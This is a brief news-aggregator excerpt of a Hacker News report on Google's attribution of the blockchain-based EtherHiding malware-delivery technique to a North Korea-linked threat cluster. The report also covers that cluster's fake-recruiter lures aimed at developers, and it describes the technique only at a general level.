"A threat actor with ties to the Democratic People's Republic of Korea (aka North Korea) has been observed leveraging the EtherHiding technique to distribute malware and enable cryptocurrency theft, marking the first time a state-sponsored hacking group has embraced the method. The activity has been attributed by Google Threat Intelligence Group (GTIG) to a threat cluster it tracks as UNC5342, which is also known as CL-STA-0240 (Palo Alto Networks Unit 42), DeceptiveDevelopment (ESET), DEV#POPPER (Securonix), Famous Chollima (CrowdStrike),"
"Google said it has observed UNC5342 incorporating EtherHiding - a stealthy approach that involves embedding nefarious code within a smart contract on a public blockchain like BNB Smart Chain (BSC) or Ethereum - since February 2025. In doing so, the attack turns the blockchain into a decentralized dead drop resolver that's resilient to takedown efforts. Besides resilience, EtherHiding also abuses the pseudonymous nature of blockchain transactions to make it harder to trace who has deployed the smart contract."
UNC5342, a threat cluster linked to the Democratic People's Republic of Korea, uses social engineering on LinkedIn to lure developers and shift conversations to Telegram or Discord. Attackers pose as recruiters or hiring managers and trick targets into running malicious code under the pretext of job assessments. The campaign aims to gain unauthorized access to developer machines, steal sensitive data, and siphon cryptocurrency assets. EtherHiding embeds malicious code into smart contracts on public blockchains like BNB Smart Chain or Ethereum, enabling decentralized dead drops that are resilient to takedown and harder to trace. The smart contract control allows attackers to update payloads dynamically, increasing operational flexibility and threat variety.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]